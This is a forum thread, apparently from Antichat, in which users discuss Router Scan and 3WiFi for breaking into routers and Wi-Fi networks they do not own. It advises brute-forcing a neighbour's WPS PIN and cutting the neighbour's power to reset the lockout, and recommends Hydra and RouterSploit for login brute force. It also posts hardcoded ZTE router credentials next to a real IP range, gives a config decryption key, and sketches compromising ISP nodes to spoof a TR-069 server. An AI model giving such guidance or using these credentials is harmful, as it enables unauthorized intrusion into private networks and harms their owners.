попробуй еще полный перебор пинов, но туполинк скорее будет блочить после 4-й или 5-й попытки (не помню точно), как выход если есть возможность (сосед на одной площадке), после блокировки твоего мака - перезагружай его (выключив и включив автомат в щитке) или конскую задержку между попытками ... (при том что надо тебе именно эту точку, а то подзависнеш с ней на долго)...
попробуй еще полный перебор пинов
100 000 000 пинов? Серьёзно?
erwerr2321
09.02.2020, 00:11
100 000 000 пинов? Серьёзно?
гораздо меньше...
говорят, что полный перебор - это всего 11 000 попыток.
говорят, что полный перебор - это всего 11 000 попыток.
Это при условии, если вам роутер отправляет пакет М3, если я правильно понимаю. Видимо в WPS 2.0 это пофиксили, и пакет М3 новые роутеры просто не отправляют, если в М2 параша
100 000 000 пинов? Серьёзно?
сначала подбирается первые 4 символа, как найдет вторую половину (3 символа) и фосьмая цифра известна (контрольная).
Это при условии, если вам роутер отправляет пакет М3, если я правильно понимаю. Видимо в WPS 2.0 это пофиксили, и пакет М3 новые роутеры просто не отправляют, если в М2 параша
ну дак ты попробуй и увидишь результат, главное точку не заблочь (пару пинов отправь)
dart8888
09.02.2020, 14:59
Хватит тупить - правая кнопка мыши на добытой сети, Store network profile.
а почему бы галку бы не сделать на данную опцию?
а почему бы галку бы не сделать на данную опцию?
а чем как сейчас не устраивает?? тем более для вытаскивания сохраненных логинов и паролей проге нужны права админа....
Попробовать:
0) другой драйвер на wifi карту (например, более старый);
1) другой wifi адаптер;
2) другую версию RS (скачать пре-релиз);
3) другую версию npcap (более старую), или вообще удалить npcap и установить старый winpcap 4.1.3
Кстати, под линуксами подключение по wps проходит нормально ?
Подскажите по npcap. Всегда задавался таким вопросом, какую лучше версию использовать. Всегда обновлялся до новой. Но бывало, что уже вскрытую точку повторно не получалось открыть, даже подсовывая правильный пин. Кто разбирался с этим подскажите хорошую проверенную версию под Win7.
binarymaster
09.02.2020, 17:22
Это при условии, если вам роутер отправляет пакет М3, если я правильно понимаю. Видимо в WPS 2.0 это пофиксили, и пакет М3 новые роутеры просто не отправляют, если в М2 параша
У вас неверная информация, WPS 2.0 здесь не при чём. Если роутер не отправляет M3, то либо режим пин кода на нём отключён (может временно, может постоянно), либо у него "проблемная" прошивка.
Почитайте спецификацию WPS на досуге.
Но бывало, что уже вскрытую точку повторно не получалось открыть, даже подсовывая правильный пин.
Это зависит от роутера и его прошивки. Если обмен WPS пакетами идёт хотя бы до Identity Request/Response, то проблема точно не в Npcap.
У вас неверная информация, WPS 2.0 здесь не при чём.
Это было всего лишь моё предположение...
Судя по всему, действительно отключен режим пин кода. На одном из роутеров пишет об этом прямо:
Trying pin "75971120"...
Sending EAPOL Start...
Received Identity Request.
Sending Identity Response...
Received WPS Message M1.
Sending WPS Message M2...
Received WSC NACK.
[-] Error: Setup is locked.
На другом просто молчок в ответ на М2
На третьем даже ассоциация не проходит
binarymaster
09.02.2020, 22:25
На другом просто молчок в ответ на М2
Возможно стоит подождать сутки, или несколько суток, возможно также плохой уровень приёма сигнала.
На третьем даже ассоциация не проходит
Либо плохой уровень сигнала, либо фильтрация по MAC адресу, либо та же история выше.
dart8888
10.02.2020, 00:13
а чем как сейчас не устраивает?? тем более для вытаскивания сохраненных логинов и паролей проге нужны права админа....
не вижу проблеммы, а вот на сенсорном ноубуке без мышки не совсем удобно пальцами попадать и без того мелкий экран). А вообще, хотелось бы уточнить у разрабов данного софта - планируется ли усовершенствование графического интерфейса ну и примочки всякие добавлять будут в дальнейшем? ) Развивать вообщем..
binarymaster
10.02.2020, 00:24
а вот на сенсорном ноубуке без мышки не совсем удобно пальцами попадать и без того мелкий экран). А вообще, хотелось бы уточнить у разрабов данного софта - планируется ли усовершенствование графического интерфейса ну и примочки всякие добавлять будут в дальнейшем?
Вряд ли, интерфейс сейчас самодостаточен и им удобно управлять с обычного ПК / устройства с мышью и клавиатурой.
По поводу адаптации под тач - я периодически думаю о том, чтобы реализовать возможность удалённого управления RS'ом через приложение 3WiFi Locator.
не совсем удобно пальцами попадать и без того мелкий экран
На данный момент могу лишь посоветовать изменить DPI на устройстве (на вашем скриншоте есть эта кнопка), либо глобально, либо только для Router Scan'а.
rules123
10.02.2020, 00:53
Ребята, в шапке версия пререлиз - означает то, что версия уже со всеми "плюшками" на данный момент? Обновленная?
rules123
10.02.2020, 04:58
Будет ли поддержка роутеров ростелекомовских zao rotek? Либо узнать бы хотя бы порты...
Иногда и даже часто работает правило "лучшее - враг хорошему", засим пробуй старые версии npcap или даже вообще проверенный временем winpcap.
а ни чего что в новых версиях баги фиксят, новое добавляют????
"ни чего", т.к. кроме фиксов иногда и новые баги добавляют!!!! есть золотое правило разумной достаточности: "работает - не трожь"(с), "лучшее - враг хорошего"(с) и т.д. и т.п. ...
бывает бывают и глюки, но их обычно быстро фиксят, а судя твоей логике, все бы еще на win 95 сидели - работает же, тот же роутер скан зачем обновляешь? самая первая же версия работает! так что не говори чуш что софт не надо обновлять, если боишся новых багов, подожди пару дней после выхода апдейта чегонибуть, отмониторь инет по этому поводу, так что не городи чушь. и + тебе ни кто не мешает откатиться назад.
А по поводу "работает - не трожь"(с) - это правило скорее для сисадминов, но и там апдейты которые затрагивают что-то глобальное - надо с умом разворачивать.
Piligrim740
10.02.2020, 09:20
Будет ли поддержка роутеров ростелекомовских zao rotek? Либо узнать бы хотя бы порты...
Rotek уже в полный рост лупит RS.
https://forum.antichat.ru/threads/398971/page-364#post-4362348
Для Дом.ру используют 80 порт, для Ростелекома могут использовать 443.
Нужно проверять Potr Scan-ом, качни для коллекции https://yadi.sk/d/XpuEDMRiKxxeyw
Rotek уже в полный рост лупит RS.
https://forum.antichat.ru/threads/398971/page-364#post-4362348
Для Дом.ру используют 80 порт, для Ростелекома могут использовать 443.
Нужно проверять Potr Scan-ом, качни для коллекции https://yadi.sk/d/XpuEDMRiKxxeyw
а вот это ппц как хорошая новость!!!! спасибо разработчику
rules123
10.02.2020, 15:21
Rotek уже в полный рост лупит RS.
видимо в моем поселке не получается никак просканировать адреса 443 портом, находит роутеры
Boa ADSL (QBR-2041WW | Ralink-3162), а ростелекома не может.
Пытался уже и в платный перебор писать, никто не может пароль подобрать.
Кто нибудь может мне ответить на некоторые вопросы:
1. Каков шанс успеха, если я подключусь к вай фай ростелекома, и просканирую сети через ростелекомовский интернет? (Сижу сейчас пока что на мтс-сим карте)
2. Подобрал одну точку доступа вай фай методом WPA2 брута, сигнал слабоват, пытаюсь логин\пасс через роутерскан пробить, он не может с вебморды слить всю инфу, модель роутера dir300 nru 5, чем еще можно пробить лог-пасс для входа?
3. Сервис 3 WI FI все время пишет ждать 10 секунд, хотя обновляю страницу, и так до бесконечности.. Пользуюсь гостевым аккаунтом.
-
1. вполне нормальный шанс просканировать ростелеком.
2. добавить свои логин\пасс лист в роутерскан, роутерсплоит, ни и лучшее, по моему мнению, приложение для брута - это гидра.
3. пробуй другой браузер, включи яваскрит в браузере, а так не глядя - хз почему, карту не загружает? точки не загружает? где именно проблема то?
rules123
10.02.2020, 16:47
Уже решил проблему.
dart8888
10.02.2020, 17:42
Почему то довольно часто попадаются роутеры ,которые просят настроить время, и дальше разгадывание не идет, это можно обойти как нибудь?
Почему то довольно часто попадаются роутеры ,которые просят настроить время, и дальше разгадывание не идет, это можно обойти как нибудь?
пример можно? а так если подумать, то скорее всего различается системное время и время на роутере.... но все же лучше скинь пример ip:loginass
dart8888
10.02.2020, 18:51
пример можно? а так если подумать, то скорее всего различается системное время и время на роутере.... но все же лучше скинь пример ip:loginass
вспомнил Вроде такое наблюдаю на "Кинетиках" в логе пишет мол "сет дата инвалид.." настройте правильное время и дату - так как не совпадает.. что то в таком духе.
Also ensure that the date time and time zone on your computer are set correctly.
Received
тру again with --force or with another (newer) set of data.
Also ensure
dart8888
10.02.2020, 21:26
Здравствуйте. сейчас сканирую апишки,подскажите,в программе нужно что-то настраивать,чтобы результаты сканирования и часы потраченные на это не пропали даром? программа сама загрузит результат в базу или надо помочь?
на сколько я понял - как выставить настройки, в данном случае "автер скан" - т.е. сразу после сканирования.
rules123
11.02.2020, 18:01
Как я понял, если в роутере включен NAT, значит смысла нету использовать эту программу?
binarymaster
11.02.2020, 20:47
Как я понял, если в роутере включен NAT, значит смысла нету использовать эту программу?
Если в роутере включён NAT, это не означает, что в нём отключено удалённое управление.
rules123
11.02.2020, 21:39
Если в роутере включён NAT, это не означает, что в нём отключено удалённое управление.
понятно.
На сайте есть точки доступа, у меня в поселке их 4, двоих тупо не существует. Будет ли чистка таких точек? P.s.: за сегодня загрузил 200 точек Удмуртии. Илон Маск, зачем нам спутник с бесплатным интернетом, если есть 3WiFi)))
На сайте есть точки доступа, у меня в поселке их 4, двоих тупо не существует. Будет ли чистка таких точек?
Вопрос - как сайт должен узнать, что роутер из эфира исчез навсегда, а не ушел на другой диапазон ip, или еще что-то в нем поменялось? Выедет команда пользователей форума, и устроит обход жителей поселка?
rules123
11.02.2020, 23:45
Выедет команда пользователей форума, и устроит обход жителей поселка?
добавить функцию удалить, хотя это не важно.
dart8888
12.02.2020, 01:54
Вопрос - как сайт должен узнать, что роутер из эфира исчез навсегда, а не ушел на другой диапазон ip, или еще что-то в нем поменялось? Выедет команда пользователей форума, и устроит обход жителей поселка?
если не пингуется скажем более 3х лет то как варик удалять или в архив до востребования), иначе просто захламляет карту. У меня на районе показывает около моего дома аж 5 штук датированных 2015 годом.. Но Сейчас их там нет.
если не пингуется скажем более 3х лет то как варик удалять или в архив до востребования), иначе просто захламляет карту. У меня на районе показывает около моего дома аж 5 штук датированных 2015 годом.. Но Сейчас их там нет.
пингуется ip адрес, а не ESSID и BSSID, ip адрес может измениться (динамический).
+ точки временно могут быть отключены (уехал в отпуск хозяин, кто-то тупо перед уходом на работу\сном отключает от розетки роутер).
dart8888
12.02.2020, 03:52
+ точки временно могут быть отключены (уехал в отпуск хозяин, кто-то тупо перед уходом на работу\сном отключает от розетки роутер).
Эх.. маркеры бы цветные тогда уж.. Например красный - это свежая точка, синяя двухгодичная , зеленая более трех.. Ну и т.д. Чтоб сильно не обольщаться в надеждах, что она еще есть там))) а вообще вам виднее.
Альтернативная база паролей к вайфай сетям
Возможно чуть улучшит Вашу базу
https://www.google.com/maps/d/u/0/v...l=-3.81666561775622e-14,43.70741235000003&z=1
Доброго времени!
Прошу подсказать почему так.
Определил свой внешний ip-адрес, затем посмотрел какие сети и провайдеры есть в моем районе. Забил указанные сети в Router Scan. Сканирую. В закладке RealTime Stat отображается информация по найденным 350 роутерам: имя роутера, сеть, mac адрес, key, WPA и т.д.
В закладке Wireless отображаются видимые сети мой wi-fi + соседские.
А теперь собственно и непонятка: на закладке RealTime Stat отсутствуют/не отображаются сети/роутеры указанные и найденные на закладке Wireless. Получается, что всё просканировал, а интересующих меня wifi сетей/роутеры нет на закладке RealTime Stat.
значит другие айпишники у точек которые рядом с тобой или закрыт доступ из внешки (если сканировал внешку) или не подобрались к ним пара логин и пароль при скане... вариантов куча почему не насканил точки которые рядом с тобой...
Роутеры "Npk Rotek" у DOM.RU , лупятся сборкой Router Scan от 04.02.2020 , по 80 порту !!!!
Сборка от 2020 года?
Сборка от 2020 года?
в шапке последнюю сборку качай http://msk1.stascorp.com/routerscan/prerelease.7z
Альтернативная база паролей к вайфай сетям
Возможно чуть улучшит Вашу базу
https://www.google.com/maps/d/u/0/viewer?mid=1Z1dI8hoBZSJNWFx2xr_MMxSxSxY&hl=en_US&l l=-3.81666561775622e-14,43.70741235000003&z=1
ну это только аэропорты, причем практически во всех аэропортах есть открытый wi-fi
Gastiganto
13.02.2020, 06:36
@binarymaster (https://forum.antichat.xyz/members/148032/) Помогите пожалуйста с фильтрами, в инструкции примеров нет. Всю ветку прошерстил на эту тему, но ничего не работает.
Есть 3 фильтра - по 3-ём производителям.
Если ставить каждый по отдельности, то всё отлично работает, а если все 3 вместе, то всё бросает в фильтр - в гуды 0.
Такое ощущение, что для того чтобы софт закинул в гуды, нужно соответствие всем 3 условиям одновременно, что невозможно
AlexDPNK
13.02.2020, 13:19
Шикарно работает, но есть пара моментов.
1. Неплохо пережевывает дешевые китайские DVR. Но Dahua и Hikvision (Hik - иногда отрабатывает) - не открывается никак
2. С роутерами отлично, почти всю китайщину вскрывает, вплоть до Huawei. Но чем свежее прошивка, тем - все понятно
3. Очень понравился "мягкий режим", в смысле что себе считает и считает. И не нагружает ничего. Правда указанный мною диапазон IP + порты = 4 суток
Спасибо огромное
binarymaster
13.02.2020, 19:17
Есть 3 фильтра - по 3-ём производителям.
В RS не бывает фильтров по производителям, только фильтры по заголовкам, и эти фильтры предназначены для фильтрации ненужных устройств, а не наоборот. Я уже несколько раз говорил об этом здесь.
сканирование по 443 порту возможно не всех роутеров?
https://drive.google.com/open?id=1RnV730sXjotmbpWlsFhyvvV4qlR0F4hE
На картинке видно, что обнаружены сетевые узлы, подключение по 443, а информацию выгрузить не получается. А по некоторым роутерам получается выгрузить инфу по 443 и ту же самую инфу по 80.
сканирование по 443 порту возможно не всех роутеров?
https://drive.google.com/open?id=1RnV730sXjotmbpWlsFhyvvV4qlR0F4hE
На картинке видно, что обнаружены сетевые узлы, подключение по 443, а информацию выгрузить не получается. А по некоторым роутерам получается выгрузить инфу по 443 и ту же самую инфу по 80.
а ты пробовал открыть в браузере айпишники эти? там же написано что не загружается страница....
а ты пробовал открыть в браузере айпишники эти? там же написано что не загружается страница....
Я понимаю, что там написано. Пробовал открывать, но при этом пинг есть.
Я понимаю, что там написано. Пробовал открывать, но при этом пинг есть.
ну что пинг есть - это и по результату сканирования видно.... как роутерскан по твоему будет подбирать пароль\использовать эксплоит там - где страница не загружается?
Gastiganto
14.02.2020, 00:53
В RS не бывает фильтров по производителям, только фильтры по заголовкам.
Это понятно, я не так выразился, по заголовкам 3 фильтра сделал, но работают они только по отдельности вот в чем вопрос
фильтры предназначены для фильтрации ненужных устройств, а не наоборот.
В таком случае зачем тогда в софте варианты - equal/not equal, contain/not contain?
Микротики оч редко "ломаются" на морду. В чем фишка? Интересны именно они.
Микротики оч редко "ломаются" на морду. В чем фишка? Интересны именно они.
в том что нет эксплоита и пара логин\пароль не подбирается потому как её нет в пасс\логин листе, в том вся и фишка.
binarymaster
14.02.2020, 16:58
В таком случае зачем тогда в софте варианты - equal/not equal, contain/not contain?
Чтобы поймать какое-то конкретное однотипное устройство, либо с какими-то спецфичными интересующими заголовками, отсеяв остальные.
Микротики оч редко "ломаются" на морду. В чем фишка? Интересны именно они.
Если так интересны, то наверно проще приобрести для себя.
Gastiganto
14.02.2020, 19:58
Чтобы поймать какое-то конкретное однотипное устройство, либо с какими-то спецфичными интересующими заголовками, отсеяв остальные.
То есть несколько условий вписать нельзя?
Просто я не понимаю - вы такой серьёзный софт написали, разве сложно было добавить условие if else? Тем более if то уже есть
binarymaster
15.02.2020, 03:44
То есть несколько условий вписать нельзя?
Можно, но только в рамках того, что дозволено фильтрами.
в том что нет эксплоита и пара логин\пароль не подбирается потому как её нет в пасс\логин листе, в том вся и фишка.
Локально эксплоит от RS ломает, а, за NATом не очень хочет - я об этом!
Если так интересны, то наверно проще приобрести для себя.
Уже. Изучаю. Даже циска не так интересна, как эти извращенцы латыши. ))
в шапке последнюю сборку качай http://msk1.stascorp.com/routerscan/prerelease.7z
При работе RouterScan появляется окно:
https://TransFiles.ru/ush9g
Совмещение полезного с приятным?)))
При работе RouterScan появляется окно:
https://TransFiles.ru/ush9g
Совмещение полезного с приятным?)))
Причем тут роутер скан? отчет то внимательней прочти? там на странице которую сканировал - майнер висит
кто нибудь подскажет в чем проблемка? бручу роутеры к примеру 5 штук. и из 5 ни к 1 не подключается!!!! дело в динамическом ip? или в чем?
dart8888
18.02.2020, 20:07
кто нибудь подскажет в чем проблемка? бручу роутеры к примеру 5 штук. и из 5 ни к 1 не подключается!!!! дело в динамическом ip? или в чем?
конкретнее объясни? как брутишь? или логи показывай? скрин хотябы?
mooooooon
19.02.2020, 04:56
does this exploit work did any one test it ?
https://diosmos.wordpress.com/2016/...ersal-unauthenticated-configuration-download/
the steps aren't clear so i can't test it .
mooooooon
19.02.2020, 17:18
have any one cracked this shadow file from ZXHN H168N router ?
mooooooon
20.02.2020, 01:14
@binarymaster (https://forum.antichat.xyz/members/148032/) do you support adding expolits ? its not new but it's not in routerscan althought it's very active till this day ...
It's on zte view wifi credentials without login.
Huh what do you think?
maxim111
20.02.2020, 11:59
Всем привет. При использовании VPN роутскан пропускает очень много ip. При этом опция SYN send times стоит на 3. Сравнивал один и тот же диапазон как с VPN так и без. Использовал разные VPN. Может есть какой проверенный VPN провайдер?
mooooooon
20.02.2020, 22:35
have any one cracked this shadow file from ZXHN H168N router?
Also how can i use sshd ?
mooooooon
20.02.2020, 23:10
Thanks but sendcmd 1 DB p DevAuthInfo
Shows me empty lines
@Kakoluk
Tried it on another telnet client and it worked ... any ideas how to grab the wps pin of the device?
sendcmd 1 DB p WLANWPS
gives me this
and tried nvram show | grep wps_device_pin but it doesn't work as it's not from the registered commands in
BusyBox v1.01
https://i.ibb.co/bmHHTyB/Screenshot-2020-02-19-13-41-33-1.png
mooooooon
20.02.2020, 23:38
any idea how can i login using this ?
tried it using curl but it failed .. how while it's enabled ?
qwerty_3322
22.02.2020, 19:14
mooooooon
Do you have direct access to the router by telnet or ssh?
mooooooon
22.02.2020, 19:30
telnet or ssh?
I have both
qwerty_3322
22.02.2020, 20:05
Then try just find the file with wps-pin and reset it. Also you probably need to find where to enable wps authentication mode on router config. And use Reaver.
mooooooon
23.02.2020, 02:54
Then try just find the file with wps-pin
There isn't !!
Here is the firmware file
https://www.mediafire.com/file/oksgi4usnlpj891/ZXHN_H168N-V3.1_MAGDY_MANDOUR.zip/file
Tell me if you found anything useful
mooooooon
23.02.2020, 19:21
Spoiler: pics https://i.imgur.com/XA3r2sp.png
what does mean ? i opened that file two and couldn't find anything about the wps pin !
I have used Binwalk. Not sure that i found info what you need, but found some interesting files.
http://www.mediafire.com/file/v300vrlrb9p3xmn/E.zip/file
but why ? you could just do it using 7 zip ... also i found that ssh password much earlier ... nothing new
mooooooon
23.02.2020, 21:51
any help decrypting this zte zxhn h108n config file
python decode_zte_config.py --key "GrWM2Hz<vz&f^5" db_default_dsl_cfg.xml config.bin.xml
or
python decode_zte_config.py --key "GrWM2Hz<vz&f^5" db_default_eth_cfg.xml config.bin.xml
the script https://pastebin.com/GGxbngtK
i got this error with the db_default_dsl_cfg.xml file
struct.error: unpack requires a buffer of 24 bytes
and this with the db_default_eth_cfg.xml file
struct.error: unpack requires a buffer of 44 bytes
mooooooon
23.02.2020, 22:01
thanks i was able to do it using RouterPassView
and i found this
what is userIF ?
note: i can't login using it .
qwerty_3322
23.02.2020, 22:09
what does mean ? i opened that file two and couldn't find anything about the wps pin !
It mean you can write there your wps pin and try to upload configuration file to the router. Also if you have ssh access to the router you can create your own root user for access to web interface. The router system is UNIX-based
mooooooon
24.02.2020, 00:40
It mean you can write there your wps pin
What wouls i gain from that ?
Also if you have ssh access to the router you can create your own root user for access to web
I don't care about that... asked about the accounts in case of other routers.
qwerty_3322
24.02.2020, 16:43
What wouls i gain from that ?
I don't care about that... asked about the accounts in case of other routers.
Any news? Did you find something?
mooooooon
24.02.2020, 17:27
Any news? Did you find something?
Nob i didn't and customers support won't help
qwerty_3322
24.02.2020, 20:08
Nob i didn't and customers support won't help
Did you try to inspect or extract data from 190000.squashfs file?
I have investigate a little bit. It need some reverse engendering skills. I have found some article but for other model:
https://reverseengineering.stackexc...s-zte-zxv10-h201l-v2-backup-config-file/14781
mooooooon
25.02.2020, 01:38
Did you try to inspect or extract data from 190000.squashfs file?
I have investigate a little bit. It need some reverse engendering skills. I have found some article but for other model:
https://reverseengineering.stackexc...s-zte-zxv10-h201l-v2-backup-config-file/14781
mate you just do it using router pass view tool from nirsoft !
Всем привет. Парни, подскажите, чем удобнее глянуть клиентов wifi без точки доступа?
Всем привет. Парни, подскажите, чем удобнее глянуть клиентов wifi без точки доступа?
что значит без точки тоступа? если её нет, то как что-то на ней посмотреть?....
а так это http://www.nirsoft.net/utils/wireless_network_watcher.html
или если ты имееш ввиду что посмотреть клиентов в той точке к которой ты не подключен, то в кали airodump-ng в station смотри маки
что значит без точки тоступа?
Я имел в виду устройства, в зоне моего приема, с включенным wi-fi, но не подключенные к роутеру.
Я имел в виду устройства, в зоне моего приема, с включенным wi-fi, но не подключенные к роутеру.
тут скорее вопрос должен звучать так: "возможно ли такое?"
да и это простым wi-fi адаптером врядли реализовать, тут надо "слушать радиоэфир" на частотах (по каналам, да и 5 Ггц в куче)
единственное создаеш открытую точку доступа и ловиш тех у кого стоит автоматом подключение к открытой точке.
это наверно ты вопрос задаешь в свете новости о уязвимости Kr00k?))))))))
kaliastr2009
27.02.2020, 21:19
Добрый день . имеется роуртер ZTE ZXHN H118N с провайдерской прошивкой от дом ру . В локальной сити RS его ломает отлично . Но Из глобальной он не досупен. Покопаясь немного обнаружил у него порт 1050 . который запрашивает логи и пасс . немного по копаясь в прошивки ( нашел в интернете ) подобрал логин cracs пароль Snyk9Tl24v75fHr9Jn9V . RS при сканирование порта 1050 пишет dirname а не ZTE ZXHN H118N .
Ip 95.79.185.0-254
ссылка на дамп прошивки https://4pda.ru/forum/index.php?s=&showtopic=463323&view=findpost&p=38654654
Есть предложения как из Глобальной сети его добить ?
тут скорее вопрос должен звучать так: "возможно ли такое?"
Это давно, хоть и коряво реализовано под винду. Думал для линукса, с его возможностями, есть что-то интереснее.
Это давно, хоть и коряво реализовано под винду. Думал для линукса, с его возможностями, есть что-то интереснее.
подскажи пжлст как реализовано...
подскажи пжлст как реализовано...
http://www.nirsoft.net/utils/wifi_channel_monitor.html
http://www.nirsoft.net/utils/wifi_channel_monitor.html
она же показывает подключеных клиентов....
а речь тобой была про не подключеных, просто с включенным вай-фаем....
Я имел в виду устройства, в зоне моего приема, с включенным wi-fi, но не подключенные к роутеру
впредь то корректнее задавай вопрос или разберись что тебе точно необходимо.
Я тут баг не баг нашел.Но скорее всего все таки небольшой Баг RS, сейчас все покажу.
Есть ноут с ВИН 10 есть встроенная карточка
Intel(R) Wireless-AC 9560 160MHz
Router scan последней версии NPCap правильно установленный.
Но RS при коннекте к любой беспроводной точке,даже к моей выдавал
такую картину
Ковырялся я и так и сяк,даже дрова карточке нашел последние 2020 года.WinPcap ставил NPcap все одно ни к чему не коннектится.
Потом подумал что может чего в настройках самой карточки мешает и точно выявил один параметр отключение которого привело к полной роботоспособности Роутер Скан.
Вот этот параметр
Выключаем его
Теперь Роутер Скан коннектится к почти любой точке.+Две взломал почти сразу.
впредь то корректнее задавай вопрос или разберись что тебе точно необходимо.
А Вам переключить ее в режим "показывать всех клиентов без точки доступа" религия не позволяет?
А Вам переключить ее в режим "показывать всех клиентов без точки доступа" религия не позволяет?
я атеист-регилигия много мне что позваляет, а так, ключевое слово "клиентов", отображать будет подключенных КЛИЕНТОВ без привязки к конкретной точке доступа, но б*** ни как не просто устройства с включеным фай-фаем, которые не подключенны ни к чему, как ты изначально задал вопрос!!!! да и тем более это уже оффтоп, лучше смотри на результат.
я атеист
Включите атеист в своем телефоне wi-fi и посмотрите результат, а лучше идите уроки делать.
dart8888
01.03.2020, 23:46
странно, у меня РС лучше работает чем Кали-Линукс)) В кали ток hs ловить збс, а впс сколько не пробовал ниче не выходит) Зато РС махом всё открывает))
Спс за прогу)
kaliastr2009
03.03.2020, 19:54
Получить доступ к промежуточным узлам сети провайдера, с целью подмены DNS и внутреннего пула Ips провайдера своим(например с помощью NAT).
Чтобы, этот самый скомпрометированный узел(в который смотрит целевой роутер) мог бы выглядеть как сеть провайдера, а на самом деле был подконтролен.
Затем, на этом узле развернуть эмуляцию командного сервера TR-069(CWMP), который бы подменял легитимный провайдерский сервер TR-069.
И запросы от которого, включая строго определённый IP или диапазон, были бы включены в список управляющих разрешений, для объявленных в прошивке этого роутера.
Только после этого, получится достучатся до данного роутера со стороны WAN, например, что бы он отдал страницу могущую содержать полезные данные для парса RS.
P.S.
Короче, что бы такое прокинуть, нужно как минимум "врезаться" хотя бы в подъездный(домовой) оптический хаб прова, и то получится отпарсить только подъезд/дом.
Вам нужен такой трах?
Нет, конечно можно подкупить инсайдера, что бы он отпарсил всю местную городскую сеть прямо с провайдерского сервера TR-069, но это уже совсем другая история.
МММ. Интересное предложение .Если честно то вообще то нужно . Но наверное это уже другая тема обсуждения .
Здравствуйте. Имеется роутер Mercusys MW325R - известен пароль WiFi и есть по нему подключение. Открыты порты 80 и 1900. Для входа в админку требует только пароль и после 10 неудачных попыток его ввода блокируется на 2 часа. Возможно ли побороть это чудо?
Mikrotik RouterOS свежее 6.42 я так понимаю РСом не ломается?
dart8888
12.03.2020, 08:00
Обновление планируется? Если да то что нового? Неплохо бы в проге видеть что есть версия выше. Или это уже есть?
Подскажите, можно ли посмотреть с помощью какого эксплойта или уязвимости routerscan (модуль Router Scan main) добыл пароль от админки (пароль был измененне и отсутствует в файле, используемом для подбора).
Подскажите, можно ли посмотреть с помощью какого эксплойта или уязвимости routerscan (модуль Router Scan main) добыл пароль от админки (пароль был измененне и отсутствует в файле, используемом для подбора).
prerelease/help/ru/exploits.html там ищи, по вендору\модели, или "модель роутера" exploit в гугле - все в паблике есть
dart8888
19.03.2020, 11:23
не плохо бы было видеть в программе фильтр на список доступных для атаки сетей. А то часто мешанина, из каши приходится выдёргивать подходящую сеть со включенным ВПС и незалоченных.
bravephoenix748
19.03.2020, 19:14
это вы нас просвещаете, или свою компетентность в хакерстве подтверждаете?
ну целое сочинение на тему роутерскан в поездках. кстати, ключевое слово в вашем вопросе- " Допустим вы едете в поезде ". и вообще-то на мой взгляд вопрос тут не в роутерскане, а в железе и обеспечении. вопрос нужно адресовать майкрософту и производителю железа если не прав ( суть вопроса изложена вами несколько путано ) - сорри.
это вы нас просвещаете, или свою компетентность в хакерстве подтверждаете?
ну целое сочинение на тему роутерскан в поездках. кстати, ключевое слово в вашем вопросе- " Допустим вы едете в поезде ". и вообще-то на мой взгляд вопрос тут не в роутерскане, а в железе и обеспечении. вопрос нужно адресовать майкрософту и производителю железа если не прав ( суть вопроса изложена вами несколько путано ) - сорри.
bravephoenix748
19.03.2020, 19:15
это вы нас просвещаете, или свою компетентность в хакерстве подтверждаете?
ну целое сочинение на тему роутерскан в поездках. кстати, ключевое слово в вашем вопросе- " Допустим вы едете в поезде ". и вообще-то на мой взгляд вопрос тут не в роутерскане, а в железе и обеспечении. вопрос нужно адресовать майкрософту и производителю железа если не прав ( суть вопроса изложена вами несколько путано ) - сорри.
Давайте поиграем во Что-Где -Когда.Вы Хакер(Знаток) а я телезритель.Мой вопрос.К какой версии Windows принадлежит файл номер 3.Вот 5.1-XP,5.2-Server2003 а номер 3-5.3????
http://f26.ifotki.info/org/955e06bc6f162794199ae2a24943b1e66dfc19367290693.jp g
binarymaster
19.03.2020, 19:43
а номер 3-5.3????
XP PosReady 2009 для загрузки с USB.
Только к чему всё это здесь? Хотите с ним пообщаться на отстранённые темы - пишите ему в личку, здесь оффтопить не надо.
dart8888
20.03.2020, 04:15
Пины для РС перестали загружатся тоже( - отдельный шлюз или канал для пинов не планируте сделать?
demon-yo
22.03.2020, 00:42
киньте инвайт плиз
CrosSZAK
23.03.2020, 22:14
и я хочу инвайт, тут только загорелся изучением уязвимости моего роутера, чёт как-то не успел в полной мере поюзать программку
binarymaster
23.03.2020, 22:45
Пины для РС перестали загружатся тоже(
киньте инвайт плиз
и я хочу инвайт
Пишите в личку, вышлю стоимость и реквизиты.
привет! забыл пароль к своей железке и прога ранее показывала пароль а сейчас нет. Роутер вроде тот же был. Сейчас подключен роутер по лану модель ниже
QBR-1041WN router TTK
Порты скана 80,8080,1080,443,161,53
Может еще какой то порт не указал?
привет! забыл пароль к своей железке и прога ранее показывала пароль а сейчас нет. Роутер вроде тот же был.
Возможно было обновление прошивки, но причин может быть куча. И что мешает сбросить до заводских настроек и юзать уже тот пароль который придумаешь (пока опять не забудеш)
Порты скана 80,8080,1080,443,161,53
Может еще какой то порт не указал?
80, 8080 и 443 вполне достаточно для поиска веб-админки (если не изменял ни чего в настройках), а так: чем больше портов - тем больше времени уйдет на скан
vova2106
05.04.2020, 14:00
Почему у меня при генерации 3wifi WPS PIN пишет все время «устройства и/или подходящие алгоритмы не найдены»
Пробывал на разных 30 точках доступа, но ничего так и не выдало.
Помогите разобраться в этом))
Piligrim740
05.04.2020, 15:00
Почему у меня при генерации 3wifi WPS PIN пишет все время «устройства и/или подходящие алгоритмы не найдены»
Пробывал на разных 30 точках доступа, но ничего так и не выдало.
Помогите разобраться в этом))
Это связано с тем, что гостевая учетка на 3WiFi закрыта, поэтому RS не может обратиться к генератору WPS пин.
Нужно сказать спасибо, одному ( или нескольким ) уроду, который пытался спарсить базу 3WiFi.
Поэтому гостевую отключили.
PS. у кого есть аккаунт на 3WiFi, таких сложностей нет.
vova2106
05.04.2020, 15:02
Это связано с тем, что гостевая учетка на 3WiFi закрыта, поэтому RS не может обратиться к генератору WPS пин.
Нужно сказать спасибо, одному ( или нескольким ) уроду, который пытался спарсить базу 3WiFi.
Поэтому гостевую отключили.
PS. у кого есть аккаунт на 3WiFi, таких сложностей нет.
У меня куплен аккаунт))Вчера покупал за 5$
Piligrim740
05.04.2020, 15:52
Для примера, скинул-бы один МАС адрес.
04:A1:51:**:**:**
А то ведь так не скажешь, не зная какого плана МАС адрес.
vova2106
05.04.2020, 17:20
Для примера, скинул-бы один МАС адрес.
04:A1:51:**:**:**
А то ведь так не скажешь, не зная какого плана МАС адрес.
04:95:E6:F1:84:F1-вот)
Piligrim740
05.04.2020, 17:24
Это Tenda, к ним нет генератора WPS пин.
Можешь тут проверять, какой роутер мучаешь.
https://2ip.ua/ru/services/information-service/mac-find
